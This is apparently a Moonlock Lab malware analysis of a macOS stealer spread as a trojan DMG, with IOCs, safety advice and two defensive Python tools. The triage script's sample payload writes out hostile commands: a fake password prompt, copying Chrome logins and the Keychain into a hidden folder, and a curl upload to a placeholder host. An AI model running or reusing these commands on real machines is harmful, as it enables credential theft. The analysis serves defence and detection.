Moonlock Lab

macOS stealer found camouflaged in an Apple/Bash payload

Mykhailo Hrebeniuk

Mar 28, 2024


macOS users face a new threat: a trojanized DMG that drops a Mach-O downloader, which in turn fetches a partially obfuscated AppleScript and Bash payload from a remote server and runs it in memory.

Examined by researchers at Moonlock Lab, these malicious pieces of software pose a significant risk to the security and privacy of unsuspecting users. This article delves into the threats posed by the Apple/Bash payload, the trojan’s modus operandi, and the potential consequences for macOS users.

The origins of the AppleScript and Bash payload

Our journey began with the discovery of several new samples of a noteworthy macOS stealer. Among them, one variant stood out, exhibiting a level of sophistication that demanded immediate attention.

This variant, a partially obfuscated AppleScript and Bash payload, was detected by only two engines on VirusTotal, Avast and AVG, when we examined it. It is related to a known family of password-stealing ware (PSW), which shows how quickly such families are repackaged to slip past detection.

This malware is just the most recent step taken by threat actors to infiltrate macOS systems. As we delved deeper, we traced its origins and exposed a web of deception.

Screenshot of the page where a partially obfuscated AppleScript and Bash payload is being stored

The propagation of infection by this stealer originated from a malicious trojan file packed in a DMG format, possibly disseminated to unsuspecting macOS users via phishing URLs.

Although the primary sources have since become inaccessible, the inventory of trojan DMG files we compiled is illuminating. The files borrowed well-known names such as Notion and GTA6, a social engineering trick that exploits the trust a familiar name carries to get users to download the malware.

Image of a partially obfuscated AppleScript and Bash payload connections

As we unraveled this web of deception, we found that the IP address serving the obfuscated AppleScript and Bash payload is linked to more than 100 phishing and malware URLs.

An image of connections of IP addresses associated with the obfuscated AppleScript and Bash payload

Exploring the infection chain, we noticed that it begins with a malicious trojan DMG file. Upon execution, it unleashes a Mach-O file named AppleApp.

AppleApp then sends an HTTP GET request to a hardcoded URL on a server with a Russian IP address and, on success, downloads the partially obfuscated AppleScript and Bash payload. The payload is executed directly from the process's memory and is never written to disk, so file-based scanners have nothing to inspect.

An image of the AppleBash infection chain diagram

How the recently discovered macOS stealer works

Let’s take a closer look at the example with the trojan DMG file named “App_v1.0.4.dmg,” initially spotted on March 19, 2024.

Mounting the DMG is harmless in itself; the danger is an image inside it that walks the user through opening the app, persuading them to bypass macOS's Gatekeeper. Gatekeeper normally refuses to launch unsigned, un-notarized applications that carry the quarantine attribute, but macOS lets the user override that decision manually. The malware exploits no Gatekeeper vulnerability: it simply talks the user into the override, and once that is done the app runs like any other.

An image of the Gatekeeper bypass trick

Once opened, the DMG releases AppleApp, a Mach-O binary that is likewise unsigned. Its only job is to download the partially obfuscated AppleScript and Bash payload from https[:]//79[.]137[.]192[.]4[:]443/strings and execute it in memory.

This script acts as a digital pickpocket, adeptly extracting credentials and targeting sensitive data repositories across various applications and databases on the victim’s Mac.

A snippet showing the request payload from remote host
A snippet showing the payload being fetched and split on the '#' delimiter, each piece then being run via system calls

When this script runs, the payload sneakily employs a multi-faceted approach to achieve its malicious objectives:

  • Phishing for credentials
  • Targeting sensitive data
  • System profiling
  • Data exfiltration

Phishing for credentials

Using deceptive dialog prompts, the malware tricks users into typing their password under the pretext of installing a helper application. Because the payload is AppleScript, the prompt is an ordinary script dialog rather than a macOS authentication request, and whatever the user types goes straight to the script.

A snippet of the malware artifacts, showing Phishing for Credentials

Targeting sensitive data

With precision, the malware hunts through system directories, looking for valuable data such as cookies, form history, and login credentials from popular web browsers including Chrome, Firefox, Brave, Edge, Opera, and OperaGX. Additionally, it seeks the recent servers list from FileZilla, macOS Keychain databases, and the wallets of cryptocurrencies.

A snippet of the malware artifacts, showing Targeting Sensitive Data

System profiling

Through system_profiler commands, the payload collects a detailed hardware and software inventory of the victim's Mac, which becomes part of the collected data.

A snippet of the malware artifacts, showing System Profiling

Data exfiltration

Using AppleScript, the malware creates a hidden folder in the user's home directory and stages the collected data there before exfiltrating it.

A snippet of the malware artifacts, showing Data Exfiltration Mechanism
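The '#'-delimited payload described earlier and the four behaviours just listed are what a triage script keys on. The Python below is an added example written for this article, not Moonlock Lab's tooling: it splits a payload on '#', labels each chunk as AppleScript or shell, and flags which of the four behaviours it shows. SAMPLE_PAYLOAD is a constructed stand-in for the real script served from /strings, the token lists in SIGNATURES are assumptions to tune against your own samples, and nothing here executes a chunk.

```python
"""Offline triage of a '#'-delimited AppleScript/Bash stealer payload.

Added example, not Moonlock Lab's code. SAMPLE_PAYLOAD is a constructed
stand-in that mimics the behaviours described in the write-up; it is not
the real payload served from /strings, and nothing here executes a chunk.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One loose heuristic per behaviour named in the write-up. The tokens are
# assumptions, not strings taken from the real payload.
SIGNATURES = {
    # AppleScript password prompt: display dialog ... with hidden answer
    "phishing_for_credentials": re.compile(
        r"display dialog.*(hidden answer|default answer)", re.I | re.S),
    # browser, FileZilla, Keychain and wallet artefacts
    "targeting_sensitive_data": re.compile(
        r"(Login Data|Cookies|formhistory\.sqlite|logins\.json|"
        r"recentservers\.xml|Keychains|login\.keychain|Exodus|Electrum)", re.I),
    "system_profiling": re.compile(r"\bsystem_profiler\b"),
    # staging in a dot-folder under $HOME, or an upload with curl
    "data_exfiltration": re.compile(
        r"\bmkdir\b.*~/\.|\bcurl\b.*(-F|-d|--data|-T)\b", re.S),
}

# Chunks that look like AppleScript go through osascript; the rest is shell.
APPLESCRIPT_HINTS = re.compile(
    r"\b(osascript|tell application|display dialog|do shell script)\b")


@dataclass
class Chunk:
    index: int
    kind: str                 # "applescript" or "bash"
    text: str
    behaviours: List[str] = field(default_factory=list)


def split_payload(blob: str, delimiter: str = "#") -> List[str]:
    """Split the raw payload on the loader's delimiter, dropping empties.

    Caveat: '#' also starts shell comments and URL fragments, so on a real
    sample check that no chunk was cut in the middle of a command.
    """
    return [p.strip() for p in blob.split(delimiter) if p.strip()]


def classify_chunk(index: int, text: str) -> Chunk:
    kind = "applescript" if APPLESCRIPT_HINTS.search(text) else "bash"
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    return Chunk(index, kind, text, hits)


def triage(blob: str) -> List[Chunk]:
    return [classify_chunk(i, t) for i, t in enumerate(split_payload(blob))]


def summarize(chunks: List[Chunk]) -> Dict[str, List[int]]:
    """Behaviour -> indexes of the chunks that exhibit it."""
    out: Dict[str, List[int]] = {}
    for c in chunks:
        for b in c.behaviours:
            out.setdefault(b, []).append(c.index)
    return out


# Constructed sample: six chunks joined with '#', covering the password
# prompt, a hidden staging folder, two data grabs, profiling and an upload.
SAMPLE_PAYLOAD = (
    "osascript -e 'display dialog \"Helper app needs your password\" "
    "default answer \"\" with hidden answer'"
    "#mkdir -p ~/.cache_store"
    '#cp "$HOME/Library/Application Support/Google/Chrome/Default/Login Data" ~/.cache_store/'
    "#cp ~/Library/Keychains/login.keychain-db ~/.cache_store/"
    "#system_profiler SPHardwareDataType SPSoftwareDataType > ~/.cache_store/sys.txt"
    "#curl -F 'f=@/tmp/out.zip' https://example.invalid/upload"
)

if __name__ == "__main__":
    for c in triage(SAMPLE_PAYLOAD):
        print(f"[{c.index}] {c.kind:<11} {','.join(c.behaviours) or '-':<26} {c.text[:60]}")
    print(summarize(triage(SAMPLE_PAYLOAD)))
```

Feed it the blob captured from the GET response (or dumped from AppleApp's memory) instead of SAMPLE_PAYLOAD; a real sample will need the token lists widened, and any chunk that ends mid-command is a sign the '#' split hit a comment or a URL fragment rather than a delimiter.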

How to stay safe from macOS stealers

This tale is a cautionary one, a reminder that vigilance is the price of security in our digital world. To stay safe from trojans and stealers, users should:

  • Exercise caution when downloading: Always be vigilant when downloading files from the internet, especially from untrusted sources. Verify the legitimacy of the source before proceeding with the download.
  • Do not follow installation instructions to bypass Gatekeeper: Under no circumstances should users follow instructions to bypass Gatekeeper, a fundamental security feature of macOS. Always keep Gatekeeper enabled to maintain the integrity of your system’s defenses against unauthorized and potentially harmful applications.
  • Beware of social engineering tactics: Be wary of unexpected system prompts or requests for sensitive information. Cybercriminals often use social engineering tactics to trick users into divulging personal data.
  • Use security software and keep it up to date: Run a security product and keep its definitions current, so that freshly repackaged samples like this one are recognized as soon as signatures exist for them.
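The first two points above can be checked rather than merely observed. The Python below is an added example, not the article's code: it reads the quarantine attribute with xattr and asks spctl for Gatekeeper's verdict on an app (for a DMG, mount it read-only and point the check at the .app inside). The parsers are pure functions, so the SAMPLE_* outputs, which are constructed rather than captured from the sample in the article, can be checked without a Mac; only run_xattr, run_spctl and check need macOS.

```python
"""Pre-launch checks for a downloaded macOS app: quarantine mark and
Gatekeeper verdict.

Added example, not the article's code. run_xattr/run_spctl shell out to the
real tools; parse_* and verdict are pure so the constructed SAMPLE_* outputs
can be checked on any platform.
"""
import subprocess
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional, Tuple

QUARANTINE_ATTR = "com.apple.quarantine"


@dataclass
class Quarantine:
    flags: int               # LaunchServices flag bits, as stored
    downloaded_at: datetime  # from the hex unix timestamp field
    agent: str               # app that downloaded the file, e.g. Safari
    uuid: str


@dataclass
class Assessment:
    accepted: bool
    source: str   # e.g. "Notarized Developer ID", "no usable signature"
    origin: str   # signing identity, empty when unsigned


def parse_quarantine(value: str) -> Optional[Quarantine]:
    """Parse 'flags;hex_time;agent[;uuid]'. Empty input means no quarantine
    mark, so Gatekeeper would not assess the file on launch at all (curl,
    scp and some archivers do not set the attribute)."""
    value = value.strip()
    if not value:
        return None
    parts = value.split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine format: {value!r}")
    return Quarantine(
        flags=int(parts[0], 16),
        downloaded_at=datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc),
        agent=parts[2],
        uuid=parts[3] if len(parts) > 3 else "",
    )


def parse_spctl(output: str) -> Assessment:
    """Parse `spctl --assess --type execute -vv PATH` output such as
        /Volumes/App/App.app: rejected
        source=no usable signature
    """
    accepted, source, origin = False, "", ""
    for line in output.splitlines():
        line = line.strip()
        if line.endswith(": accepted"):
            accepted = True
        elif line.startswith("source="):
            source = line[len("source="):]
        elif line.startswith("origin="):
            origin = line[len("origin="):]
    return Assessment(accepted, source, origin)


def verdict(q: Optional[Quarantine], a: Assessment) -> Tuple[bool, str]:
    """Strict policy: open only what Gatekeeper accepts on its own. A
    'rejected' result is exactly the case where the DMG's image tells the
    victim to use the manual override."""
    if not a.accepted:
        return False, f"Gatekeeper rejects it ({a.source or 'no verdict'}); do not override"
    note = f"accepted via {a.source}" + (f" ({a.origin})" if a.origin else "")
    if q is None:
        note += "; WARNING: no quarantine mark, Gatekeeper would not check this on launch"
    else:
        note += f"; downloaded by {q.agent} at {q.downloaded_at:%Y-%m-%d %H:%M}Z"
    return True, note


def run_xattr(path: str) -> str:
    r = subprocess.run(["xattr", "-p", QUARANTINE_ATTR, path],
                       capture_output=True, text=True)
    return r.stdout if r.returncode == 0 else ""   # missing attribute -> non-zero


def run_spctl(path: str) -> str:
    # spctl prints its verdict to stderr; capture both streams.
    r = subprocess.run(["spctl", "--assess", "--type", "execute", "-vv", path],
                       capture_output=True, text=True)
    return r.stdout + r.stderr


def check(app_path: str) -> Tuple[bool, str]:
    """macOS only: run both tools against a .app bundle."""
    return verdict(parse_quarantine(run_xattr(app_path)),
                   parse_spctl(run_spctl(app_path)))


# Constructed outputs, not captured from the sample in the article.
SAMPLE_QUARANTINE = "0083;66124f12;Safari;5A1B2C3D-0000-4000-8000-000000000000"
SAMPLE_SPCTL_REJECTED = "/Volumes/App/App.app: rejected\nsource=no usable signature\n"
SAMPLE_SPCTL_ACCEPTED = ("/Applications/Foo.app: accepted\n"
                         "source=Notarized Developer ID\n"
                         "origin=Developer ID Application: Example Corp (ABCDE12345)\n")

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(check(sys.argv[1]))
    else:
        q = parse_quarantine(SAMPLE_QUARANTINE)
        print(verdict(q, parse_spctl(SAMPLE_SPCTL_REJECTED)))
        print(verdict(q, parse_spctl(SAMPLE_SPCTL_ACCEPTED)))
```

Run it as `python3 check.py /Volumes/App/App.app` after `hdiutil attach -readonly -nobrowse` on the DMG. An unsigned binary like AppleApp comes back "rejected" with "no usable signature", which is precisely the point at which the trojan's instructions would have you click through the override.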

Indicators of compromise (IOC)

Indicator | Type | Description
511a01dcb0fe86c9f2f432400a28487d53e83cdb03af7701f28511f260eb1a83 | SHA256 | AppleScript and Bash payload
b575ff5af6ea232b74fba11893d2f861de3ccc56f5a983dbe54aa5162f480cd2 | SHA256 | Trojan DMG
3aa1dd8ef5c19901af7c50f32e25a047f5fcc30d76ca6dca3068605817db5e34 | SHA256 | Malware Mach-O (AppleApp)
79[.]137[.]192[.]4[:]443 | IP | IP address associated with the AppleScript and Bash payload and with phishing sites
https[:]//79[.]137[.]192[.]4[:]443/strings | URL | URL where the AppleScript and Bash payload was hosted

This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. Mac, macOS, and AppleScript are trademarks of Apple Inc.

Mykhailo Hrebeniuk
Mykhailo is a macOS security researcher specializing in malware analysis, data analysis, and developing tools. He previously worked as a software developer with embedded Linux and networking, specializing in vulnerability research.